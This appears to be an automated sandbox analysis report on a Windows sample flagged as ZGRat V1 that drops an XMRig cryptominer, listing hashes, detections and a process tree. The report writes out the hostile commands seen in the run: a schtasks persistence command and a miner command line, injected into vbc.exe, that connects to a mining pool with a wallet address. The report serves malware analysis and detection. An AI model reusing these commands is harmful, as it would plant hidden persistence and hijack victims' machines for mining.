Analysis
-
max time kernel
268s -
max time network
311s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
29-01-2024 04:54
Behavioral task
behavioral1
Sample
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe
Resource
win7-20231215-en
General
-
Target
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe
-
Size
5.6MB
-
MD5
1a27bd843a09f923661a15300e02d703
-
SHA1
5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
-
SHA256
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
-
SHA512
330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
-
SSDEEP
49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T
Malware Config
Signatures
-
Detect ZGRat V1 4 IoCs
resource yara_rule behavioral2/memory/212-0-0x00000000009F0000-0x0000000000F90000-memory.dmp family_zgrat_v1 behavioral2/files/0x000600000001aba7-12.dat family_zgrat_v1 behavioral2/files/0x000600000001aba7-13.dat family_zgrat_v1 behavioral2/files/0x000600000001aba7-44.dat family_zgrat_v1 -
XMRig Miner payload 19 IoCs
resource yara_rule behavioral2/memory/3200-23-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/3200-25-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/3200-26-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/3200-27-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/3200-28-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/3200-29-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/3200-32-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/3200-33-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/3200-35-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/3200-36-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/3200-38-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/3200-37-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/3200-41-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4596-60-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4596-61-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4596-57-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4596-67-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4596-68-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/4596-69-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
.NET Reactor proctector 4 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/212-0-0x00000000009F0000-0x0000000000F90000-memory.dmp net_reactor behavioral2/files/0x000600000001aba7-12.dat net_reactor behavioral2/files/0x000600000001aba7-13.dat net_reactor behavioral2/files/0x000600000001aba7-44.dat net_reactor -
Executes dropped EXE 2 IoCs
pid Process 1332 .exe 2276 .exe -
resource yara_rule behavioral2/memory/3200-17-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-19-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-21-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-22-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-23-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-25-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-26-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-27-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-28-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-29-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-32-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-33-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-35-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-36-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-38-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-37-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/3200-41-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4596-53-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4596-56-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4596-59-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4596-60-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4596-61-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4596-57-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4596-64-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4596-66-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4596-67-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4596-68-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/4596-69-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1332 set thread context of 3200 1332 .exe 81 PID 2276 set thread context of 4596 2276 .exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2500 schtasks.exe 756 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3648 timeout.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1332 .exe 2276 .exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 636 Process not Found 636 Process not Found -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 212 8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe Token: SeDebugPrivilege 1332 .exe Token: SeLockMemoryPrivilege 3200 vbc.exe Token: SeLockMemoryPrivilege 3200 vbc.exe Token: SeDebugPrivilege 2276 .exe Token: SeLockMemoryPrivilege 4596 vbc.exe Token: SeLockMemoryPrivilege 4596 vbc.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3200 vbc.exe 4596 vbc.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 212 wrote to memory of 164 212 8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe 73 PID 212 wrote to memory of 164 212 8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe 73 PID 164 wrote to memory of 3648 164 cmd.exe 75 PID 164 wrote to memory of 3648 164 cmd.exe 75 PID 164 wrote to memory of 1332 164 cmd.exe 76 PID 164 wrote to memory of 1332 164 cmd.exe 76 PID 1332 wrote to memory of 3068 1332 .exe 78 PID 1332 wrote to memory of 3068 1332 .exe 78 PID 3068 wrote to memory of 756 3068 cmd.exe 79 PID 3068 wrote to memory of 756 3068 cmd.exe 79 PID 1332 wrote to memory of 3200 1332 .exe 81 PID 1332 wrote to memory of 3200 1332 .exe 81 PID 1332 wrote to memory of 3200 1332 .exe 81 PID 1332 wrote to memory of 3200 1332 .exe 81 PID 1332 wrote to memory of 3200 1332 .exe 81 PID 1332 wrote to memory of 3200 1332 .exe 81 PID 1332 wrote to memory of 3200 1332 .exe 81 PID 2276 wrote to memory of 1572 2276 .exe 83 PID 2276 wrote to memory of 1572 2276 .exe 83 PID 1572 wrote to memory of 2500 1572 cmd.exe 86 PID 1572 wrote to memory of 2500 1572 cmd.exe 86 PID 2276 wrote to memory of 4596 2276 .exe 87 PID 2276 wrote to memory of 4596 2276 .exe 87 PID 2276 wrote to memory of 4596 2276 .exe 87 PID 2276 wrote to memory of 4596 2276 .exe 87 PID 2276 wrote to memory of 4596 2276 .exe 87 PID 2276 wrote to memory of 4596 2276 .exe 87 PID 2276 wrote to memory of 4596 2276 .exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe"C:\Users\Admin\AppData\Local\Temp\8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9F4D.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:164 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:3648
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Creates scheduled task(s)
PID:756
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3200
-
-
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
PID:2500
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4596
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
330KB
MD5d2fedcb9aa37870346391f43973672f0
SHA1083b0b473b332f5812df46c0edbb79f461ac16c8
SHA256053e05c396e5c006187196fdab875f773dee9c75450878a5e84db846a5dd8e12
SHA5122acabdd255feb796c303be8d7f29b5cfc59ad1a7168aa240ddabcff29c7dbb0fee758d1ae7d718cf59117805cfe34b767f616fd21a0aae83df2df43f2c015e5d
-
Filesize
348KB
MD5850f844bf4337fcfe59e32d3165478a8
SHA11a64d9fa85b77d20efda399b9509aba3b3789e9d
SHA25611b10e0e1ba70c653376fc3e74b8d583e42fd5e7edf2323e36a9d283a8089fa5
SHA5129bcae348c8e5694df8f8fbdf4fe396d2b8450b801109e927af662adcb21e85c123099c08c4dc525ef8ff9b9bcbd9ae244de14265f7d2c2897ee1ddd9d4083318
-
Filesize
125KB
MD541bca59b7f2ad4cff23c6624e431d062
SHA1448984ad1faa92a9cd01d3bedcde27da5e410f93
SHA2561e527984ccac9eb68b563cfded74b0d6b9efa3f7feac694e3b35c606d3bafe24
SHA512faea757552ca8de53146ac43a3afc46938c81924b18b9e83e21a66c71a8a83c87c487640f079277a60a7284c697577b0a07a5d06008478014f38d58f4f26834b
-
Filesize
1KB
MD599e47c178875de9fe1675fe5ba0e1f42
SHA1c28934210fbe9d2ee90e751b8cf21be297b3d171
SHA256773f7a03c7b56de09b71249ce4920458ef67fda14b923df1d5ebc1725101b9ff
SHA5127a4b79273bbc4b5966680a48d63115feed3ae48dfc0ea2a7a11e202d06d9ecab2b4b1b8e2a3d1eb9e9b35169cf9ca866f785875e19e5eeadfe11b54500c05f4c
-
Filesize
168B
MD5488a0cc98c1e0d44736bf82e66997ce3
SHA16a02297238b1b224ca12626fd8ce5372ba8232b9
SHA2567871aa41e30a4c4761446a3d1ea7f36799f11895c2664f25474a1aa005a90b9c
SHA512888490c058b8bec55d1b63e89dec6b08d2c5ee4a7c5281538008f1c814cb93324bb6886fc4ac4de9a36d8cafc9ac9d8a82d90bd5367f8d5d648aefbe449bef73